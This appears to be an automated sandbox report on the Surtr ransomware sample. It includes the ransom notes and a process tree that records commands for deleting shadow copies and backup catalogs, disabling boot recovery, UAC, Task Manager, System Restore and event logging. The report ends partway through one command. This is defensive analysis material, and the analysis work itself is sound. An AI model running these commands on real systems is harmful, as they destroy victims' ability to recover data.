Analysis

  • max time kernel
    4294164s
  • max time network
    10s
  • platform
    windows7_x64
  • resource
    win7-20220223-en
  • submitted
    02-03-2022 08:06

General

  • Target

    Surtr.exe

  • Size

    191KB

  • MD5

    664cf36657bf55f20cac44505d3bbb2c

  • SHA1

    a48f8089455201895757503255d0f573ce5d3c66

  • SHA256

    4a3bd45ec4a4002ff69f941678b310e2c31bc9c8dc525fe203f6ef44258b0d35

  • SHA512

    42a433048ee5770244ab9f1b1165c7fd4baa87f400036a086e40020dfcfcbb4806fce55622df0cf6c64846ab7e397c1735edbe4aac2e6d153097ae6d9400f735

Malware Config

Extracted

Path

C:\ProgramData\Service\SURTR_README.txt

Ransom Note
What happened to your files? Unfortunately, your server was compromised, using a security hole in your server. All your files are encrypted with a military algorithm . in order to contact us you can email this address Dec_youfile1986@mailfence.com use this ID( jic101rxx5u76w ) for the title of your email. if you weren't able to contact us within 24 hours please email : Telegram id @Ransome_Decrypters Only we can decrypt your files. Please do not contact separate fraudulent sites. You can use freeand even paid software on the Internet, but it is uselessand will cause you to lose filesand timeand money.
Emails

Dec_youfile1986@mailfence.com

Extracted

Path

C:\ProgramData\Service\SURTR_README.hta

Ransom Note
SurtrRansomware OOPS ALL YOUR IMPORTANT FILES HAVE BEEN ENCRYPTED AND STOLEN !! Notice : There is only one way to restore your data read the boxes carefully! Attention : Do Not change file names. Do Not try to decrypt using third party softwares , it may cause permanent data loss . your files will be sold on the Dark Web after 15 days. Imagine 1 million hackers have all your information including files, IP, name and number and location and ... Do not pay any money before decrypting the test files. You can use our 50% discount if you pay the fee within first 15 days of encryption . otherwise the price will be doubled. In order to warranty you , our team will decrypt 3 of your desired files for free.but you need to pay the specified price for the rest of the operation . How To Decrypt : Your system is offline . in order to contact us you can email this address Dec_youfile1986@mailfence.com use this ID (jic101rxx5u76w) for the title of your email . If you weren't able to contact us within 24 hours please email : Telegram id @Ransome_Decrypters If you didn't get any respond within 48 hours use this link (Not Available Now).send your ID and your cryptor name (SurtrRansomwareUserName) therefore we can create another way to contact you as soon as possible
Emails

Dec_youfile1986@mailfence.com

Signatures

  • Deletes NTFS Change Journal 2 TTPs

    The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.

  • UAC bypass 3 TTPs
  • Clears Windows event logs 1 TTPs
  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
  • Deletes backup catalog 3 TTPs 1 IoCs

    Uses wbadmin.exe to inhibit system recovery.

  • Disables Task Manager via registry modification
  • Disables use of System Restore points 1 TTPs
  • UPX packed file 4 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops startup file 3 IoCs
  • Adds Run key to start application 2 TTPs 8 IoCs
  • Drops desktop.ini file(s) 38 IoCs
  • Enumerates connected drives 3 TTPs 64 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Interacts with shadow copies 2 TTPs 52 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Modifies registry class 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 16 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 8 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Surtr.exe
    "C:\Users\Admin\AppData\Local\Temp\Surtr.exe"
    1⤵
    • Drops desktop.ini file(s)
    • Enumerates connected drives
    • Sets desktop wallpaper using registry
    • Drops file in Program Files directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:1592
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c mkdir C:\ProgramData\Service
      2⤵
        PID:732
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c @echo off
        2⤵
          PID:1504
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c chcp 437
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:580
          • C:\Windows\SysWOW64\chcp.com
            chcp 437
            3⤵
              PID:564
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c mkdir "%TEMP%\Service"
            2⤵
              PID:1904
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet
              2⤵
                PID:956
                • C:\Windows\system32\vssadmin.exe
                  vssadmin.exe Delete Shadows /all /quiet
                  3⤵
                  • Interacts with shadow copies
                  PID:2464
              • C:\Windows\System32\cmd.exe
                "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB
                2⤵
                  PID:1768
                  • C:\Windows\system32\vssadmin.exe
                    vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB
                    3⤵
                    • Interacts with shadow copies
                    PID:2220
                • C:\Windows\System32\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No
                  2⤵
                    PID:1076
                    • C:\Windows\system32\bcdedit.exe
                      bcdedit /set {default} recoveryenabled No
                      3⤵
                      • Modifies boot configuration data using bcdedit
                      PID:3432
                  • C:\Windows\System32\cmd.exe
                    "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded
                    2⤵
                      PID:1892
                      • C:\Windows\system32\vssadmin.exe
                        vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded
                        3⤵
                        • Interacts with shadow copies
                        PID:2256
                    • C:\Windows\System32\cmd.exe
                      "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=E:\ /on=E:\ /maxsize=unbounded
                      2⤵
                        PID:1916
                        • C:\Windows\system32\vssadmin.exe
                          vssadmin resize shadowstorage /for=E:\ /on=E:\ /maxsize=unbounded
                          3⤵
                          • Enumerates connected drives
                          • Interacts with shadow copies
                          PID:4020
                      • C:\Windows\System32\cmd.exe
                        "C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:
                        2⤵
                          PID:1960
                          • C:\Windows\system32\fsutil.exe
                            fsutil.exe usn deletejournal /D C:
                            3⤵
                              PID:2536
                          • C:\Windows\System32\cmd.exe
                            "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=E:\ /on=E:\ /maxsize=401MB
                            2⤵
                              PID:1876
                              • C:\Windows\system32\vssadmin.exe
                                vssadmin resize shadowstorage /for=E:\ /on=E:\ /maxsize=401MB
                                3⤵
                                • Enumerates connected drives
                                • Interacts with shadow copies
                                PID:2212
                            • C:\Windows\System32\cmd.exe
                              "C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
                              2⤵
                                PID:1240
                                • C:\Windows\system32\bcdedit.exe
                                  bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
                                  3⤵
                                  • Modifies boot configuration data using bcdedit
                                  PID:2428
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=I:\ /on=I:\ /maxsize=unbounded
                                2⤵
                                  PID:1300
                                  • C:\Windows\system32\vssadmin.exe
                                    vssadmin resize shadowstorage /for=I:\ /on=I:\ /maxsize=unbounded
                                    3⤵
                                    • Interacts with shadow copies
                                    PID:2472
                                • C:\Windows\System32\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\System /v AllowBlockingAppsAtShutdown /t REG_DWORD /d 1 /f
                                  2⤵
                                    PID:1436
                                    • C:\Windows\system32\reg.exe
                                      reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\System /v AllowBlockingAppsAtShutdown /t REG_DWORD /d 1 /f
                                      3⤵
                                        PID:2404
                                    • C:\Windows\System32\cmd.exe
                                      "C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v StartMenuLogOff /t REG_DWORD /d 1 /f
                                      2⤵
                                        PID:1644
                                        • C:\Windows\system32\reg.exe
                                          reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v StartMenuLogOff /t REG_DWORD /d 1 /f
                                          3⤵
                                            PID:2000
                                        • C:\Windows\System32\cmd.exe
                                          "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=N:\ /on=N:\ /maxsize=401MB
                                          2⤵
                                            PID:1552
                                            • C:\Windows\system32\vssadmin.exe
                                              vssadmin resize shadowstorage /for=N:\ /on=N:\ /maxsize=401MB
                                              3⤵
                                              • Interacts with shadow copies
                                              PID:4000
                                          • C:\Windows\System32\cmd.exe
                                            "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=M:\ /on=M:\ /maxsize=unbounded
                                            2⤵
                                              PID:1260
                                              • C:\Windows\system32\vssadmin.exe
                                                vssadmin resize shadowstorage /for=M:\ /on=M:\ /maxsize=unbounded
                                                3⤵
                                                • Enumerates connected drives
                                                • Interacts with shadow copies
                                                PID:3592
                                            • C:\Windows\System32\cmd.exe
                                              "C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d 1 /f
                                              2⤵
                                                PID:1156
                                                • C:\Windows\system32\reg.exe
                                                  reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d 1 /f
                                                  3⤵
                                                    PID:2828
                                                • C:\Windows\System32\cmd.exe
                                                  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=M:\ /on=M:\ /maxsize=401MB
                                                  2⤵
                                                    PID:1264
                                                    • C:\Windows\system32\vssadmin.exe
                                                      vssadmin resize shadowstorage /for=M:\ /on=M:\ /maxsize=401MB
                                                      3⤵
                                                      • Enumerates connected drives
                                                      • Interacts with shadow copies
                                                      PID:2496
                                                  • C:\Windows\System32\cmd.exe
                                                    "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=L:\ /on=L:\ /maxsize=unbounded
                                                    2⤵
                                                      PID:560
                                                      • C:\Windows\system32\vssadmin.exe
                                                        vssadmin resize shadowstorage /for=L:\ /on=L:\ /maxsize=unbounded
                                                        3⤵
                                                        • Enumerates connected drives
                                                        • Interacts with shadow copies
                                                        PID:3888
                                                    • C:\Windows\System32\cmd.exe
                                                      "C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f
                                                      2⤵
                                                        PID:2028
                                                        • C:\Windows\system32\reg.exe
                                                          reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f
                                                          3⤵
                                                            PID:2836
                                                        • C:\Windows\System32\cmd.exe
                                                          "C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
                                                          2⤵
                                                            PID:872
                                                            • C:\Windows\system32\reg.exe
                                                              reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
                                                              3⤵
                                                                PID:3472
                                                            • C:\Windows\System32\cmd.exe
                                                              "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=L:\ /on=L:\ /maxsize=401MB
                                                              2⤵
                                                                PID:1188
                                                                • C:\Windows\system32\vssadmin.exe
                                                                  vssadmin resize shadowstorage /for=L:\ /on=L:\ /maxsize=401MB
                                                                  3⤵
                                                                  • Enumerates connected drives
                                                                  • Interacts with shadow copies
                                                                  PID:2644
                                                              • C:\Windows\System32\cmd.exe
                                                                "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=K:\ /on=K:\ /maxsize=unbounded
                                                                2⤵
                                                                  PID:1860
                                                                  • C:\Windows\system32\vssadmin.exe
                                                                    vssadmin resize shadowstorage /for=K:\ /on=K:\ /maxsize=unbounded
                                                                    3⤵
                                                                    • Enumerates connected drives
                                                                    • Interacts with shadow copies
                                                                    PID:3992
                                                                • C:\Windows\System32\cmd.exe
                                                                  "C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f
                                                                  2⤵
                                                                    PID:1696
                                                                    • C:\Windows\system32\reg.exe
                                                                      reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f
                                                                      3⤵
                                                                        PID:2572
                                                                    • C:\Windows\System32\cmd.exe
                                                                      "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=K:\ /on=K:\ /maxsize=401MB
                                                                      2⤵
                                                                        PID:2020
                                                                        • C:\Windows\system32\vssadmin.exe
                                                                          vssadmin resize shadowstorage /for=K:\ /on=K:\ /maxsize=401MB
                                                                          3⤵
                                                                          • Enumerates connected drives
                                                                          • Interacts with shadow copies
                                                                          PID:2596
                                                                      • C:\Windows\System32\cmd.exe
                                                                        "C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
                                                                        2⤵
                                                                          PID:1560
                                                                          • C:\Windows\system32\reg.exe
                                                                            reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
                                                                            3⤵
                                                                              PID:3444
                                                                          • C:\Windows\System32\cmd.exe
                                                                            "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=J:\ /on=J:\ /maxsize=unbounded
                                                                            2⤵
                                                                              PID:752
                                                                              • C:\Windows\system32\vssadmin.exe
                                                                                vssadmin resize shadowstorage /for=J:\ /on=J:\ /maxsize=unbounded
                                                                                3⤵
                                                                                • Enumerates connected drives
                                                                                • Interacts with shadow copies
                                                                                PID:3984
                                                                            • C:\Windows\System32\cmd.exe
                                                                              "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=J:\ /on=J:\ /maxsize=401MB
                                                                              2⤵
                                                                                PID:928
                                                                                • C:\Windows\system32\vssadmin.exe
                                                                                  vssadmin resize shadowstorage /for=J:\ /on=J:\ /maxsize=401MB
                                                                                  3⤵
                                                                                  • Enumerates connected drives
                                                                                  • Interacts with shadow copies
                                                                                  PID:3456
                                                                              • C:\Windows\System32\cmd.exe
                                                                                "C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v StartMenuLogOff /t REG_DWORD /d 1 /f
                                                                                2⤵
                                                                                  PID:1808
                                                                                  • C:\Windows\system32\reg.exe
                                                                                    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v StartMenuLogOff /t REG_DWORD /d 1 /f
                                                                                    3⤵
                                                                                      PID:2480
                                                                                  • C:\Windows\System32\cmd.exe
                                                                                    "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=I:\ /on=I:\ /maxsize=401MB
                                                                                    2⤵
                                                                                      PID:1284
                                                                                      • C:\Windows\system32\vssadmin.exe
                                                                                        vssadmin resize shadowstorage /for=I:\ /on=I:\ /maxsize=401MB
                                                                                        3⤵
                                                                                        • Enumerates connected drives
                                                                                        • Interacts with shadow copies
                                                                                        PID:2448
                                                                                    • C:\Windows\System32\cmd.exe
                                                                                      "C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
                                                                                      2⤵
                                                                                        PID:1692
                                                                                        • C:\Windows\system32\reg.exe
                                                                                          reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
                                                                                          3⤵
                                                                                            PID:2412
                                                                                        • C:\Windows\System32\cmd.exe
                                                                                          "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=H:\ /on=H:\ /maxsize=unbounded
                                                                                          2⤵
                                                                                            PID:784
                                                                                            • C:\Windows\system32\vssadmin.exe
                                                                                              vssadmin resize shadowstorage /for=H:\ /on=H:\ /maxsize=unbounded
                                                                                              3⤵
                                                                                              • Enumerates connected drives
                                                                                              • Interacts with shadow copies
                                                                                              PID:3908
                                                                                          • C:\Windows\System32\cmd.exe
                                                                                            "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
                                                                                            2⤵
                                                                                              PID:840
                                                                                              • C:\Windows\system32\reg.exe
                                                                                                reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
                                                                                                3⤵
                                                                                                  PID:3508
                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=H:\ /on=H:\ /maxsize=401MB
                                                                                                2⤵
                                                                                                  PID:972
                                                                                                  • C:\Windows\system32\vssadmin.exe
                                                                                                    vssadmin resize shadowstorage /for=H:\ /on=H:\ /maxsize=401MB
                                                                                                    3⤵
                                                                                                    • Enumerates connected drives
                                                                                                    • Interacts with shadow copies
                                                                                                    PID:2560
                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                  "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                                                                                                  2⤵
                                                                                                    PID:1920
                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                      reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                                                                                                      3⤵
                                                                                                        PID:2972
                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                      "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=G:\ /on=G:\ /maxsize=unbounded
                                                                                                      2⤵
                                                                                                        PID:824
                                                                                                        • C:\Windows\system32\vssadmin.exe
                                                                                                          vssadmin resize shadowstorage /for=G:\ /on=G:\ /maxsize=unbounded
                                                                                                          3⤵
                                                                                                          • Enumerates connected drives
                                                                                                          • Interacts with shadow copies
                                                                                                          PID:2420
                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                        "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=G:\ /on=G:\ /maxsize=401MB
                                                                                                        2⤵
                                                                                                          PID:1424
                                                                                                          • C:\Windows\system32\vssadmin.exe
                                                                                                            vssadmin resize shadowstorage /for=G:\ /on=G:\ /maxsize=401MB
                                                                                                            3⤵
                                                                                                            • Enumerates connected drives
                                                                                                            • Interacts with shadow copies
                                                                                                            PID:2228
                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                          "C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable
                                                                                                          2⤵
                                                                                                            PID:1400
                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                              schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable
                                                                                                              3⤵
                                                                                                                PID:2192
                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                              "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded
                                                                                                              2⤵
                                                                                                                PID:1140
                                                                                                                • C:\Windows\system32\vssadmin.exe
                                                                                                                  vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded
                                                                                                                  3⤵
                                                                                                                  • Enumerates connected drives
                                                                                                                  • Interacts with shadow copies
                                                                                                                  PID:3488
                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                "C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet
                                                                                                                2⤵
                                                                                                                  PID:1912
                                                                                                                  • C:\Windows\system32\wbadmin.exe
                                                                                                                    wbadmin.exe delete catalog -quiet
                                                                                                                    3⤵
                                                                                                                    • Deletes backup catalog
                                                                                                                    PID:2544
                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB
                                                                                                                  2⤵
                                                                                                                    PID:1932
                                                                                                                    • C:\Windows\system32\vssadmin.exe
                                                                                                                      vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB
                                                                                                                      3⤵
                                                                                                                      • Enumerates connected drives
                                                                                                                      • Interacts with shadow copies
                                                                                                                      PID:2436
                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                    "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=N:\ /on=N:\ /maxsize=unbounded
                                                                                                                    2⤵
                                                                                                                      PID:1544
                                                                                                                      • C:\Windows\system32\vssadmin.exe
                                                                                                                        vssadmin resize shadowstorage /for=N:\ /on=N:\ /maxsize=unbounded
                                                                                                                        3⤵
                                                                                                                        • Enumerates connected drives
                                                                                                                        • Interacts with shadow copies
                                                                                                                        PID:3168
                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                      "C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f
                                                                                                                      2⤵
                                                                                                                        PID:2144
                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                          reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f
                                                                                                                          3⤵
                                                                                                                            PID:4068
                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                          "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=O:\ /on=O:\ /maxsize=unbounded
                                                                                                                          2⤵
                                                                                                                            PID:2792
                                                                                                                            • C:\Windows\system32\vssadmin.exe
                                                                                                                              vssadmin resize shadowstorage /for=O:\ /on=O:\ /maxsize=unbounded
                                                                                                                              3⤵
                                                                                                                              • Enumerates connected drives
                                                                                                                              • Interacts with shadow copies
                                                                                                                              PID:4300
                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                            "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f
                                                                                                                            2⤵
                                                                                                                              PID:2768
                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f
                                                                                                                                3⤵
                                                                                                                                  PID:4316
                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=O:\ /on=O:\ /maxsize=401MB
                                                                                                                                2⤵
                                                                                                                                  PID:2760
                                                                                                                                  • C:\Windows\system32\vssadmin.exe
                                                                                                                                    vssadmin resize shadowstorage /for=O:\ /on=O:\ /maxsize=401MB
                                                                                                                                    3⤵
                                                                                                                                    • Enumerates connected drives
                                                                                                                                    • Interacts with shadow copies
                                                                                                                                    PID:4368
                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=P:\ /on=P:\ /maxsize=401MB
                                                                                                                                  2⤵
                                                                                                                                    PID:2816
                                                                                                                                    • C:\Windows\system32\vssadmin.exe
                                                                                                                                      vssadmin resize shadowstorage /for=P:\ /on=P:\ /maxsize=401MB
                                                                                                                                      3⤵
                                                                                                                                      • Enumerates connected drives
                                                                                                                                      • Interacts with shadow copies
                                                                                                                                      PID:4344
                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                    "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=P:\ /on=P:\ /maxsize=unbounded
                                                                                                                                    2⤵
                                                                                                                                      PID:2852
                                                                                                                                      • C:\Windows\system32\vssadmin.exe
                                                                                                                                        vssadmin resize shadowstorage /for=P:\ /on=P:\ /maxsize=unbounded
                                                                                                                                        3⤵
                                                                                                                                        • Enumerates connected drives
                                                                                                                                        • Interacts with shadow copies
                                                                                                                                        PID:2000
                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                      "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f
                                                                                                                                      2⤵
                                                                                                                                        PID:2844
                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                          reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f
                                                                                                                                          3⤵
                                                                                                                                            PID:4352
                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                          "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f
                                                                                                                                          2⤵
                                                                                                                                            PID:2804
                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                              reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f
                                                                                                                                              3⤵
                                                                                                                                                PID:3712
                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                              "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=Q:\ /on=Q:\ /maxsize=401MB
                                                                                                                                              2⤵
                                                                                                                                                PID:2876
                                                                                                                                                • C:\Windows\system32\vssadmin.exe
                                                                                                                                                  vssadmin resize shadowstorage /for=Q:\ /on=Q:\ /maxsize=401MB
                                                                                                                                                  3⤵
                                                                                                                                                  • Enumerates connected drives
                                                                                                                                                  • Interacts with shadow copies
                                                                                                                                                  PID:1704
                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f
                                                                                                                                                2⤵
                                                                                                                                                  PID:2868
                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f
                                                                                                                                                    3⤵
                                                                                                                                                      PID:2804
                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                    "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f
                                                                                                                                                    2⤵
                                                                                                                                                      PID:2884
                                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                                        reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f
                                                                                                                                                        3⤵
                                                                                                                                                          PID:4052
                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                        "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=Q:\ /on=Q:\ /maxsize=unbounded
                                                                                                                                                        2⤵
                                                                                                                                                          PID:2892
                                                                                                                                                          • C:\Windows\system32\vssadmin.exe
                                                                                                                                                            vssadmin resize shadowstorage /for=Q:\ /on=Q:\ /maxsize=unbounded
                                                                                                                                                            3⤵
                                                                                                                                                            • Enumerates connected drives
                                                                                                                                                            • Interacts with shadow copies
                                                                                                                                                            PID:4360
                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                          "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=T:\ /on=T:\ /maxsize=unbounded
                                                                                                                                                          2⤵
                                                                                                                                                            PID:540
                                                                                                                                                            • C:\Windows\system32\vssadmin.exe
                                                                                                                                                              vssadmin resize shadowstorage /for=T:\ /on=T:\ /maxsize=unbounded
                                                                                                                                                              3⤵
                                                                                                                                                              • Enumerates connected drives
                                                                                                                                                              • Interacts with shadow copies
                                                                                                                                                              PID:3632
                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                            "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System\{9580d7dd-0379-4658-9870-d5be7d52d6de} /v Enable /t REG_DWORD /d 0 /f
